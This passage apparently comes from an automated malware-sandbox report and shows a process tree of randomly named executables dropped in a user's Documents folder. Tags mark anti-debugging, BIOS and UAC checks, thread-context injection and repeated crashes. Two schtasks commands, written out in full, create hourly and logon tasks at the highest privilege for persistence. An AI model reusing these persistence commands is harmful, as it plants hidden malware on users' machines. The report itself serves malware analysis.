C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
-
C:\Users\Admin\Documents\AalTGrsjFu7Ccb8Rl8dDfvfV.exe"C:\Users\Admin\Documents\AalTGrsjFu7Ccb8Rl8dDfvfV.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Documents\KPOYBsEiW7toZFo6D52uV4cj.exe"C:\Users\Admin\Documents\KPOYBsEiW7toZFo6D52uV4cj.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\tzEVLrrdEVWd48ASAEtRiWq7.exe"C:\Users\Admin\Documents\tzEVLrrdEVWd48ASAEtRiWq7.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\sadlXnc3wPoZxcS8ICQF5ppQ.exe"C:\Users\Admin\Documents\sadlXnc3wPoZxcS8ICQF5ppQ.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 2723⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe"C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 284⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 284⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 284⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10108 -s 284⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8524 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7340 -s 284⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10008 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
